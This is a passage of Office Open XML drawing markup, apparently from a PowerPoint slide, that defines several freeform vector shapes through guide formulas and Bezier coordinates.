                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156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9" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32"/>
                    <a:pt x="158" y="51"/>
                    <a:pt x="176" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="51"/>
                    <a:pt x="197" y="43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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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0" name="Freeform 231">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28277EF5-ECE3-4C4B-9CE7-D2DF632DB72D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484562" y="2065338"/>
              <a:ext cx="28575" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 80"/>
                <a:gd name="T1" fmla="*/ 129 h 154"/>
                <a:gd name="T2" fmla="*/ 39 w 80"/>
                <a:gd name="T3" fmla="*/ 104 h 154"/>
                <a:gd name="T4" fmla="*/ 32 w 80"/>
                <a:gd name="T5" fmla="*/ 104 h 154"/>
                <a:gd name="T6" fmla="*/ 30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4 w 80"/>
                <a:gd name="T13" fmla="*/ 0 h 154"/>
                <a:gd name="T14" fmla="*/ 0 w 80"/>
                <a:gd name="T15" fmla="*/ 97 h 154"/>
                <a:gd name="T16" fmla="*/ 38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5"/>
                    <a:pt x="54" y="104"/>
                    <a:pt x="39" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="104"/>
                    <a:pt x="33" y="104"/>
                    <a:pt x="32" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="104"/>
                    <a:pt x="30" y="100"/>
                    <a:pt x="30" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="87"/>
                    <a:pt x="32" y="52"/>
                    <a:pt x="71" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="26"/>
                    <a:pt x="80" y="24"/>
                    <a:pt x="80" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="7"/>
                    <a:pt x="71" y="0"/>
                    <a:pt x="64" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="0"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="135"/>
                    <a:pt x="18" y="154"/>
                    <a:pt x="38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1" name="Freeform 232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9F6FDC7-A39E-47D2-97A7-44F656D31A22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575050" y="2065338"/>
              <a:ext cx="26988" cy="61913"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 80"/>
                <a:gd name="T1" fmla="*/ 129 h 154"/>
                <a:gd name="T2" fmla="*/ 40 w 80"/>
                <a:gd name="T3" fmla="*/ 104 h 154"/>
                <a:gd name="T4" fmla="*/ 33 w 80"/>
                <a:gd name="T5" fmla="*/ 104 h 154"/>
                <a:gd name="T6" fmla="*/ 31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5 w 80"/>
                <a:gd name="T13" fmla="*/ 0 h 154"/>
                <a:gd name="T14" fmla="*/ 0 w 80"/>
                <a:gd name="T15" fmla="*/ 97 h 154"/>
                <a:gd name="T16" fmla="*/ 39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5"/>
                    <a:pt x="54" y="104"/>
                    <a:pt x="40" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="104"/>
                    <a:pt x="34" y="104"/>
                    <a:pt x="33" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="104"/>
                    <a:pt x="31" y="100"/>
                    <a:pt x="31" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="87"/>
                    <a:pt x="32" y="52"/>
                    <a:pt x="71" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="26"/>
                    <a:pt x="80" y="24"/>
                    <a:pt x="80" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="7"/>
                    <a:pt x="72" y="0"/>
                    <a:pt x="65" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="0"/>
                    <a:pt x="0" y="34"/>
                    <a:pt x="0" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="135"/>
                    <a:pt x="19" y="154"/>
                    <a:pt x="39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2" name="Freeform 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FFAC6B0-7DFD-49A6-BA04-B737E3E62399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643312" y="2051050"/>
              <a:ext cx="66675" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 194"/>
                <a:gd name="T1" fmla="*/ 487 h 499"/>
                <a:gd name="T2" fmla="*/ 184 w 194"/>
                <a:gd name="T3" fmla="*/ 499 h 499"/>
                <a:gd name="T4" fmla="*/ 194 w 194"/>
                <a:gd name="T5" fmla="*/ 489 h 499"/>
                <a:gd name="T6" fmla="*/ 191 w 194"/>
                <a:gd name="T7" fmla="*/ 481 h 499"/>
                <a:gd name="T8" fmla="*/ 21 w 194"/>
                <a:gd name="T9" fmla="*/ 12 h 499"/>
                <a:gd name="T10" fmla="*/ 10 w 194"/>
                <a:gd name="T11" fmla="*/ 0 h 499"/>
                <a:gd name="T12" fmla="*/ 0 w 194"/>
                <a:gd name="T13" fmla="*/ 10 h 499"/>
                <a:gd name="T14" fmla="*/ 2 w 194"/>
                <a:gd name="T15" fmla="*/ 18 h 499"/>
                <a:gd name="T16" fmla="*/ 172 w 194"/>
                <a:gd name="T17" fmla="*/ 48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9">
                  <a:moveTo>
                    <a:pt x="172" y="487"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="494"/>
                    <a:pt x="177" y="499"/>
                    <a:pt x="184" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="499"/>
                    <a:pt x="194" y="494"/>
                    <a:pt x="194" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="488"/>
                    <a:pt x="194" y="487"/>
                    <a:pt x="191" y="481"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4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2" y="18"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172" y="4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3" name="Freeform 234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C554574-F663-4D06-99BA-4431E3F6BB57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724275" y="2116138"/>
              <a:ext cx="80963" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 130 w 234"/>
                <a:gd name="T1" fmla="*/ 105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4" name="Freeform 235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D1A49E5-9054-4542-83BB-5DF554BCDA3D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817937" y="2076450"/>
              <a:ext cx="73025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1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7"/>
                    <a:pt x="34" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="80"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="106" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="31"/>
                    <a:pt x="177" y="79"/>
                    <a:pt x="177" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="227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5" name="Freeform 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E17779E-6782-4660-96B5-5F5C92448E4C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905250" y="2076450"/>
              <a:ext cx="79375" cy="127000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 232"/>
                <a:gd name="T1" fmla="*/ 189 h 310"/>
                <a:gd name="T2" fmla="*/ 0 w 232"/>
                <a:gd name="T3" fmla="*/ 206 h 310"/>
                <a:gd name="T4" fmla="*/ 20 w 232"/>
                <a:gd name="T5" fmla="*/ 226 h 310"/>
                <a:gd name="T6" fmla="*/ 146 w 232"/>
                <a:gd name="T7" fmla="*/ 226 h 310"/>
                <a:gd name="T8" fmla="*/ 146 w 232"/>
                <a:gd name="T9" fmla="*/ 280 h 310"/>
                <a:gd name="T10" fmla="*/ 115 w 232"/>
                <a:gd name="T11" fmla="*/ 280 h 310"/>
                <a:gd name="T12" fmla="*/ 95 w 232"/>
                <a:gd name="T13" fmla="*/ 295 h 310"/>
                <a:gd name="T14" fmla="*/ 115 w 232"/>
                <a:gd name="T15" fmla="*/ 310 h 310"/>
                <a:gd name="T16" fmla="*/ 204 w 232"/>
                <a:gd name="T17" fmla="*/ 310 h 310"/>
                <a:gd name="T18" fmla="*/ 224 w 232"/>
                <a:gd name="T19" fmla="*/ 295 h 310"/>
                <a:gd name="T20" fmla="*/ 204 w 232"/>
                <a:gd name="T21" fmla="*/ 280 h 310"/>
                <a:gd name="T22" fmla="*/ 174 w 232"/>
                <a:gd name="T23" fmla="*/ 280 h 310"/>
                <a:gd name="T24" fmla="*/ 174 w 232"/>
                <a:gd name="T25" fmla="*/ 226 h 310"/>
                <a:gd name="T26" fmla="*/ 212 w 232"/>
                <a:gd name="T27" fmla="*/ 226 h 310"/>
                <a:gd name="T28" fmla="*/ 232 w 232"/>
                <a:gd name="T29" fmla="*/ 211 h 310"/>
                <a:gd name="T30" fmla="*/ 212 w 232"/>
                <a:gd name="T31" fmla="*/ 196 h 310"/>
                <a:gd name="T32" fmla="*/ 174 w 232"/>
                <a:gd name="T33" fmla="*/ 196 h 310"/>
                <a:gd name="T34" fmla="*/ 174 w 232"/>
                <a:gd name="T35" fmla="*/ 20 h 310"/>
                <a:gd name="T36" fmla="*/ 153 w 232"/>
                <a:gd name="T37" fmla="*/ 0 h 310"/>
                <a:gd name="T38" fmla="*/ 139 w 232"/>
                <a:gd name="T39" fmla="*/ 0 h 310"/>
                <a:gd name="T40" fmla="*/ 118 w 232"/>
                <a:gd name="T41" fmla="*/ 10 h 310"/>
                <a:gd name="T42" fmla="*/ 4 w 232"/>
                <a:gd name="T43" fmla="*/ 189 h 310"/>
                <a:gd name="T44" fmla="*/ 35 w 232"/>
                <a:gd name="T45" fmla="*/ 196 h 310"/>
                <a:gd name="T46" fmla="*/ 146 w 232"/>
                <a:gd name="T47" fmla="*/ 22 h 310"/>
                <a:gd name="T48" fmla="*/ 146 w 232"/>
                <a:gd name="T49" fmla="*/ 196 h 310"/>
                <a:gd name="T50" fmla="*/ 35 w 232"/>
                <a:gd name="T51" fmla="*/ 19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310">
                  <a:moveTo>
                    <a:pt x="4" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="206"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="4" y="226"/>
                    <a:pt x="20" y="226"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="146" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="280"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="280"/>
                    <a:pt x="95" y="280"/>
                    <a:pt x="95" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="310"/>
                    <a:pt x="107" y="310"/>
                    <a:pt x="115" y="310"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="204" y="310"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="310"/>
                    <a:pt x="224" y="310"/>
                    <a:pt x="224" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="280"/>
                    <a:pt x="212" y="280"/>
                    <a:pt x="204" y="280"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="226"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="226"/>
                    <a:pt x="232" y="226"/>
                    <a:pt x="232" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="196"/>
                    <a:pt x="220" y="196"/>
                    <a:pt x="212" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="4"/>
                    <a:pt x="170" y="0"/>
                    <a:pt x="153" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="0"/>
                    <a:pt x="125" y="0"/>
                    <a:pt x="118" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="189"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="35" y="196"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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6" name="Freeform 237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB85D5A-C802-46D6-9B79-B0236DEB6354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998912" y="2051050"/>
              <a:ext cx="66675" cy="203200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 194"/>
                <a:gd name="T1" fmla="*/ 487 h 499"/>
                <a:gd name="T2" fmla="*/ 184 w 194"/>
                <a:gd name="T3" fmla="*/ 499 h 499"/>
                <a:gd name="T4" fmla="*/ 194 w 194"/>
                <a:gd name="T5" fmla="*/ 489 h 499"/>
                <a:gd name="T6" fmla="*/ 192 w 194"/>
                <a:gd name="T7" fmla="*/ 481 h 499"/>
                <a:gd name="T8" fmla="*/ 21 w 194"/>
                <a:gd name="T9" fmla="*/ 12 h 499"/>
                <a:gd name="T10" fmla="*/ 10 w 194"/>
                <a:gd name="T11" fmla="*/ 0 h 499"/>
                <a:gd name="T12" fmla="*/ 0 w 194"/>
                <a:gd name="T13" fmla="*/ 10 h 499"/>
                <a:gd name="T14" fmla="*/ 3 w 194"/>
                <a:gd name="T15" fmla="*/ 18 h 499"/>
                <a:gd name="T16" fmla="*/ 173 w 194"/>
                <a:gd name="T17" fmla="*/ 48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9">
                  <a:moveTo>
                    <a:pt x="173" y="487"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="494"/>
                    <a:pt x="178" y="499"/>
                    <a:pt x="184" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="499"/>
                    <a:pt x="194" y="494"/>
                    <a:pt x="194" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="488"/>
                    <a:pt x="194" y="487"/>
                    <a:pt x="192" y="481"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="12"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="4"/>
                    <a:pt x="17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73" y="4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7" name="Freeform 238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE905A90-B44A-4E97-8A96-5FF4547C399B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081462" y="2116138"/>
              <a:ext cx="79375" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 129 w 233"/>
                <a:gd name="T1" fmla="*/ 105 h 215"/>
                <a:gd name="T2" fmla="*/ 186 w 233"/>
                <a:gd name="T3" fmla="*/ 31 h 215"/>
                <a:gd name="T4" fmla="*/ 206 w 233"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 226 w 233"/>
                <a:gd name="T7" fmla="*/ 16 h 215"/>
                <a:gd name="T8" fmla="*/ 206 w 233"/>
                <a:gd name="T9" fmla="*/ 0 h 215"/>
                <a:gd name="T10" fmla="*/ 148 w 233"/>
                <a:gd name="T11" fmla="*/ 0 h 215"/>
                <a:gd name="T12" fmla="*/ 128 w 233"/>
                <a:gd name="T13" fmla="*/ 15 h 215"/>
                <a:gd name="T14" fmla="*/ 152 w 233"/>
                <a:gd name="T15" fmla="*/ 31 h 215"/>
                <a:gd name="T16" fmla="*/ 115 w 233"/>
                <a:gd name="T17" fmla="*/ 81 h 215"/>
                <a:gd name="T18" fmla="*/ 77 w 233"/>
                <a:gd name="T19" fmla="*/ 31 h 215"/>
                <a:gd name="T20" fmla="*/ 101 w 233"/>
                <a:gd name="T21" fmla="*/ 15 h 215"/>
                <a:gd name="T22" fmla="*/ 81 w 233"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 23 w 233"/>
                <a:gd name="T25" fmla="*/ 0 h 215"/>
                <a:gd name="T26" fmla="*/ 3 w 233"/>
                <a:gd name="T27" fmla="*/ 16 h 215"/>
                <a:gd name="T28" fmla="*/ 23 w 233"/>
                <a:gd name="T29" fmla="*/ 31 h 215"/>
                <a:gd name="T30" fmla="*/ 43 w 233"/>
                <a:gd name="T31" fmla="*/ 31 h 215"/>
                <a:gd name="T32" fmla="*/ 102 w 233"/>
                <a:gd name="T33" fmla="*/ 105 h 215"/>
                <a:gd name="T34" fmla="*/ 40 w 233"/>
                <a:gd name="T35" fmla="*/ 185 h 215"/>
                <a:gd name="T36" fmla="*/ 20 w 233"/>
                <a:gd name="T37" fmla="*/ 185 h 215"/>
                <a:gd name="T38" fmla="*/ 0 w 233"/>
                <a:gd name="T39" fmla="*/ 200 h 215"/>
                <a:gd name="T40" fmla="*/ 20 w 233"/>
                <a:gd name="T41" fmla="*/ 215 h 215"/>
                <a:gd name="T42" fmla="*/ 78 w 233"/>
                <a:gd name="T43" fmla="*/ 215 h 215"/>
                <a:gd name="T44" fmla="*/ 98 w 233"/>
                <a:gd name="T45" fmla="*/ 200 h 215"/>
                <a:gd name="T46" fmla="*/ 72 w 233"/>
                <a:gd name="T47" fmla="*/ 185 h 215"/>
                <a:gd name="T48" fmla="*/ 115 w 233"/>
                <a:gd name="T49" fmla="*/ 124 h 215"/>
                <a:gd name="T50" fmla="*/ 160 w 233"/>
                <a:gd name="T51" fmla="*/ 185 h 215"/>
                <a:gd name="T52" fmla="*/ 135 w 233"/>
                <a:gd name="T53" fmla="*/ 200 h 215"/>
                <a:gd name="T54" fmla="*/ 155 w 233"/>
                <a:gd name="T55" fmla="*/ 215 h 215"/>
                <a:gd name="T56" fmla="*/ 213 w 233"/>
                <a:gd name="T57" fmla="*/ 215 h 215"/>
                <a:gd name="T58" fmla="*/ 233 w 233"/>
                <a:gd name="T59" fmla="*/ 200 h 215"/>
                <a:gd name="T60" fmla="*/ 213 w 233"/>
                <a:gd name="T61" fmla="*/ 185 h 215"/>
                <a:gd name="T62" fmla="*/ 193 w 233"/>
                <a:gd name="T63" fmla="*/ 185 h 215"/>
                <a:gd name="T64" fmla="*/ 129 w 233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15">
                  <a:moveTo>
                    <a:pt x="129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6" y="31"/>
                    <a:pt x="226" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226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7" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="31"/>
                    <a:pt x="101" y="31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8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2" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115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3" y="215"/>
                    <a:pt x="233" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="233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8" name="Freeform 239">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C64DF94-743C-47CB-9E50-63C2CF01A005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173537" y="2078038"/>
              <a:ext cx="68263" cy="125413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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 51 h 307"/>
                <a:gd name="T16" fmla="*/ 197 w 197"/>
                <a:gd name="T17" fmla="*/ 30 h 307"/>
                <a:gd name="T18" fmla="*/ 149 w 197"/>
                <a:gd name="T19" fmla="*/ 0 h 307"/>
                <a:gd name="T20" fmla="*/ 70 w 197"/>
                <a:gd name="T21" fmla="*/ 66 h 307"/>
                <a:gd name="T22" fmla="*/ 70 w 197"/>
                <a:gd name="T23" fmla="*/ 92 h 307"/>
                <a:gd name="T24" fmla="*/ 21 w 197"/>
                <a:gd name="T25" fmla="*/ 92 h 307"/>
                <a:gd name="T26" fmla="*/ 0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20 w 197"/>
                <a:gd name="T29" fmla="*/ 123 h 307"/>
                <a:gd name="T30" fmla="*/ 70 w 197"/>
                <a:gd name="T31" fmla="*/ 123 h 307"/>
                <a:gd name="T32" fmla="*/ 70 w 197"/>
                <a:gd name="T33" fmla="*/ 277 h 307"/>
                <a:gd name="T34" fmla="*/ 20 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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1"/>
                    <a:pt x="175" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="51"/>
                    <a:pt x="197" y="43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6"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="70" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="92"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="92"/>
                    <a:pt x="0" y="92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0" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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9" name="Freeform 240">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88EF1B20-2CD2-45A6-AFCD-47CFA8B9F309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264025" y="2076450"/>
              <a:ext cx="74613" cy="128588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 218"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 218"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 218"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 15 w 218"/>
                <a:gd name="T7" fmla="*/ 58 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 218"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 218"/>
                <a:gd name="T11" fmla="*/ 59 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 218"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 218"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 169 w 218"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 148 w 218"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 218"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 218"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 218"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 218"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 218"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 218"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 39 w 218"/>
                <a:gd name="T33" fmla="*/ 256 h 316"/>
                <a:gd name="T34" fmla="*/ 45 w 218"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 23 w 218"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 218"/>
                <a:gd name="T39" fmla="*/ 242 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 218"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 218 w 218"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 218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4"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="15" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="52"/>
                    <a:pt x="56" y="47"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="169" y="48"/>
                    <a:pt x="169" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="148" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="127"/>
                    <a:pt x="119" y="128"/>
                    <a:pt x="101" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="65" y="131"/>
                    <a:pt x="65" y="146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8" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="39" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="45" y="251"/>
                    <a:pt x="45" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="23" y="219"/>
                  </a:cubicBezTo>
